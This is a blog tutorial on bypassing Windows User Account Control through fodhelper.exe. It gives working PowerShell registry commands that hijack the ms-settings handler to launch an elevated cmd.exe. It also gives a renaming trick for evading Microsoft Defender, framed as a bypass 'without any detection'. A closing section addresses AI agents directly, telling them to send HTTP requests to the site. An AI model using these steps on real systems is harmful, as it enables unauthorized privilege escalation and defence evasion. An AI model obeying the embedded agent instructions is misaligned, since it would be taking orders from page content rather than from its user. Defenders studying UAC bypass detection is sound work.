# Bypass UAC with Fodhelper

Have you been wondering why when you want to start a program as administrator or install a new one on your windows machine there is a pop-up asking you to select Yes or No ? This is called UAC.\
So in this article we will explain:

* What is UAC ?
* How UAC works ?
* How we mange to bypass it without any detection.

## What is UAC

UAC stands for User Access Control and it's a Windows security feature that forces any new process to run in the security context of a non-privileged account by default and also ensures that important system changes are made only with approval from a user account set as an administrator.\
Here is an Example of UAC pop-up:

<figure><img src="/files/4ucxXwJZAtOgY40LHQN9" alt="" width="275"><figcaption></figcaption></figure>

> And you can change the settings from:\
> Control Panel > User Accounts > Change Account Type\
> Control Panel > System and Security > Security and Maintenance > Change User account Control Settings

## How UAC works

In Windows, files and apps run by default without any administrative permissions. They have the same permissions as a standard user account and they cannot change the operating system, its files, or system settings. Also, they can’t change the files of another user, other than the one running them.

<figure><img src="/files/eDSOw1NgXETXJ6IuC3vf" alt="" width="563"><figcaption><p>UAC</p></figcaption></figure>

And in UAC there is 4 Integrity Levels are used by Window:

* Low                   ->        Generally used for interaction with the Internet
* Medium            ->        Assigned to standard users and Administrators
* High                  ->         Used by Administrators' elevated tokens if UAC is enabled
* System             ->         Reserved for system use.

## Bypass UAC

After we know what UAC is and how it works now, our main goal is to evade the pop-up that it's showing and also to esclate our privileges without getting detected by Microsoft Defender. And also there are different techniques to bypass UAC, but in our case we used fodhelper.

> **Fodhelper** is a trusted binary in Windows operating systems, which allows elevation without requiring a UAC prompt with most UAC settings

{% hint style="info" %}
This technique was inspire by this blog in github but with little changes:\
<https://github.com/winscripting/UAC-bypass/blob/master/FodhelperBypass.ps1>
{% endhint %}

From the blog we can see that the bypass require you to create a new key in the current user hive and add the DelegateExecute property to the key and followed by a custom value to execute.\
First we create this structure in the registry in order to manipulate fodhelper to execute a command with higher privileges

```
New-Item "HKCU:\Software\Classes\ms-settings\Shell\Open\command" -Force
New-ItemProperty -Path "HKCU:\Software\Classes\ms-settings\Shell\Open\command" -Name "DelegateExecute" -Value "" -Force
Set-ItemProperty -Path "HKCU:\Software\Classes\ms-settings\Shell\Open\command" -Name "(default)" -Value $program -Force
```

Now the main focus is the $program value in the third line that we will play with. After we get everything in place, I changed the $program value to the path of cmd to executed as Administrator.:

```
Set-ItemProperty -Path "HKCU:\Software\Classes\ms-settings\Shell\Open\command" -Name "(default)" -Value "c:\Windows\System32\cmd.exe" -Force
```

When we try to lunch fodhelper.exe Microsoft Defender detect it and block it

<figure><img src="/files/asutmOxninslufffq0kC" alt="" width="365"><figcaption></figcaption></figure>

So then I played around with this and i found out that I can bypass it by copying cmd from C:\Windows\System32\cmd.exe to C:\Users\Fh(any name).exe by changing the name and editing the value with our cmd that will evade MD and open a CMD with high Integrity:

<figure><img src="/files/kU7vjoY8ZbPy8k3ipXNU" alt=""><figcaption></figcaption></figure>

And here you can see the different that our cmd(qw) is Elevated

<figure><img src="/files/50otSvK9fZHUtNiFlfYw" alt=""><figcaption></figcaption></figure>

In the next article we will talk about tokens and how to escalate it from Administrator priv to NT Authority.\
I hope you enjoyed reading it and always play around \*\_^

{% embed url="<https://learn.microsoft.com/en-us/windows/security/identity-protection/user-account-control/user-account-control-overview>" %}

{% embed url="<https://learn.microsoft.com/en-us/cpp/security/how-user-account-control-uac-affects-your-application?view=msvc-170>" %}

{% embed url="<https://learn.microsoft.com/en-us/windows/win32/secauthz/mandatory-integrity-control>" %}

{% embed url="<https://github.com/winscripting/UAC-bypass/blob/master/FodhelperBypass.ps1>" %}


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://pwn3dx.gitbook.io/bypass-uac-with-fodhelper/bypass-uac-with-fodhelper.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.